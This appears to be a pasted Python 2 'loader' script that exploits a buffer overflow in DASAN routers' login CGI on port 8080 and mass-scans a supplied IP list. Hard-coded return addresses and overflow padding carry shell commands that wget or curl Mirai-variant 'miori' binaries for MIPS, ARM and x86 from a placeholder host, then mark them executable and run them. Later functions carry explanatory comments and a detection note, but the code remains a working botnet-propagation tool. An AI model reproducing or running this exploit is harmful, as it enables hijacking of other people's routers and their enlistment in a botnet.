miraip0ts

dasan router loader

Mar 16th, 2018
  1. #!/usr/bin/python
  2.  
  3. #nexus zeta is big 0 day exploiter 10/10
  4. import sys, socket, json, time, ssl, struct, os
  5. from threading import Thread
  6. if len(sys.argv) < 2:
  7.     print "Usage: python "+sys.argv[0]+" <list>"
  8.     sys.exit()
  9. port = 8080
  10. buf = 4096
  11. pre_pl0 = 0x2ad0c000
  12. pre_pl2 = pre_pl0 + 0x00115d40
  13. pl2 = struct.pack(">i",pre_pl2)
  14. pre_pl3 = pre_pl0 + 0x0003CC9C
  15. pl3 =  struct.pack(">i",pre_pl3)
  16.  
  17. payload = "/bin/sh wget http://IP/miori.mips; curl -O http://IP/miori.mips cat miori.mips >fwergf; chmod 777 fwergf; ./fwergf senpai.dasan"
  18. payload2 = "/bin/sh wget http://IP/miori.mpsl; curl -O http://IP/miori.mpsl cat miori.mpsl >fwerg; chmod 777 fwerg; ./fwerg senpai.dasan"
  19. payload3 = "/bin/sh wget http://IP/miori.x86; curl -O http://IP/miori.x86 cat miori.x86 >fwer; chmod 777 fwer; ./fwer senpai.dasan"
  20. payload4 = "/bin/sh wget http://IP/miori.arm7; curl -O http://IP/miori.arm7 cat miori.arm7 >fwe; chmod 777 fwe; ./fwe senpai.dasan"
  21. pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
  22. pre_data2 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload2
  23. pre_data3 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload3
  24. pre_data4 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload4
  25. post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  26. post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  27. post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  28. post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  29. headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  30. headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)
  31. headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)
  32. headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)
  33. i = 0
  34. ips = open(sys.argv[1]).readlines()
  35.  
def dasan(host):
    """Open a TLS socket to ``host``:``port`` and write the prebuilt request strings.

    Reads the module-level ``port``, ``buf``, ``headers``, ``headers2`` and
    ``headers3``; increments the module-level counter ``i`` when the first
    response chunk contains "200 OK". Every exception is swallowed, so the
    caller learns nothing about refused connections, TLS failures or timeouts.

    Detection note (from the visible request strings): the traffic is a TLS
    session to TCP/8080 carrying POSTs to /cgi-bin/login_action.cgi whose
    Host/Referer headers are hard-coded to 192.168.1.100:8080 regardless of
    the actual destination address -- a Host header that does not match the
    connected peer is a cheap server-side/proxy signal for this kind of tool.
    """
    global i
    host = host.strip("\n")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # ssl.wrap_socket() with no cert_reqs/ca_certs performs no certificate
        # validation, so any TLS endpoint is accepted.
        s = ssl.wrap_socket(sock)
        s.connect((host, port))
        s.send(headers)
        s.send(headers2)
        s.send(headers3)
        # Only one recv() of at most ``buf`` bytes is inspected; whatever the
        # peer sends after that is never read.
        resp = s.recv(buf).strip()
        if "200 OK" in resp:
            # Shared counter updated from many threads without a lock; used
            # only for the progress display in the main loop.
            i += 1
        s.close()
    except:
        # Bare except: also hides KeyboardInterrupt/SystemExit inside this thread.
        pass
  52.        
def worker():
    """Start one thread per entry of the module-level ``ips`` list, 10 ms apart.

    Threads are neither bounded nor joined; after the loop a fixed 30 s sleep
    is the only wait before ``sys.exit``. NOTE(review): this function runs on
    ``workerthrd``, not the main thread, so ``sys.exit`` here raises
    SystemExit in this thread only -- the main display loop is not stopped
    by it (confirm against the interpreter version in use).
    """
    for ip in ips:
        try:
            ip = ip.strip("\r\n")
            t = Thread(target=dasan, args=(ip,))
            t.start()
            time.sleep(0.01)
        except:
            # Swallows thread-creation failures (e.g. resource limits) silently.
            pass
    time.sleep(30)
    sys.exit("Finished Scanning")
# Launch the dispatcher thread, echo the first request string, then loop
# forever refreshing a one-line counter of "200 OK" responses seen.
workerthrd = Thread(target=worker)
workerthrd.start()
print headers
while True:
    try:
        # ``sent`` is assigned but never used; the display reads ``i`` directly.
        sent = i
        sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
        sys.stdout.flush()
        time.sleep(1)
    except KeyboardInterrupt:
        # Only Ctrl-C ends the process; the worker thread's own sys.exit does not.
        sys.exit("Exiting On User Input")
    except:
        pass